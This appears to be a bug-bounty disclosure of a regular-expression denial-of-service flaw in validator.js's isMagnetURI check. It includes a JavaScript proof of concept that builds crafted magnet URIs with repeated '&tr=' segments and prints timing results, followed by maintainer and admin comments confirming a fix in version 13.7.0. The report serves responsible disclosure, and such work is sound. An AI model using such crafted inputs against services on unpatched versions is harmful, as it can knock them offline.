Inefficient Regular Expression Complexity in validatorjs/validator.js

Valid

Reported on

Sep 17th 2021


Description

I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in validator.

It allows causing a denial of service when validating crafted, invalid MagnetURIs.

The ReDoS vulnerability is mainly due to the sub-pattern .+&tr=.+ with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var validator = require("validator");

// Build progressively longer crafted inputs and time validator.isMagnetURI() on each one.
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    // 32-char hash, an empty dn, then i*10000 copies of "&tr=", and a trailing CRLF so the final ".+$" can never match
    var attack_str = 'magnet:?xt=urn:a:' + 'a'.repeat(32) + '&dn=' + '&tr='.repeat(i * 10000) + "\r\na\r\n";
    validator.isMagnetURI(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

The Output

"attack_str.length: 40058: 464 ms"
"attack_str.length: 80058: 1717 ms"
"attack_str.length: 120058: 3864 ms"
"attack_str.length: 160058: 6871 ms"
"attack_str.length: 200058: 10895 ms"
"attack_str.length: 240058: 15493 ms"
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Sarhan Aissi validated this vulnerability a year ago
Yeting Li has been awarded the disclosure bounty
The fix bounty is now up for grabs
Sarhan Aissi
a year ago

Maintainer


Thank you Yeting Li for reporting this ReDoS. A fix has been submitted and is awaiting merge!

Yeting Li
a year ago

Researcher


Hi, Sarhan, thank you for your confirmation. And I just checked that the fixed regex is safe.

Jamie Slome
a year ago

Admin


Same here! Once we have confirmed the fix, we can go ahead and publish a CVE on your behalf.

Thanks! 🎊

Yeting Li
a year ago

Researcher


Hi @admin, can you assign a CVE?

Jamie Slome
a year ago

Admin


@yetingli - thanks for the comment, we no longer assign CVEs to Inefficient Regular Expression Complexity.

We are doing this for our own internal quality and vetting process on reports before disclosing publicly via CVE.

Sarhan Aissi confirmed that a fix has been merged on 737694 a year ago
The fix bounty has been dropped
isMagnetURI.js#L3 has been validated
Sarhan Aissi
a year ago

Maintainer


Thank you guys! We finally released the fix in validator 13.7.0.
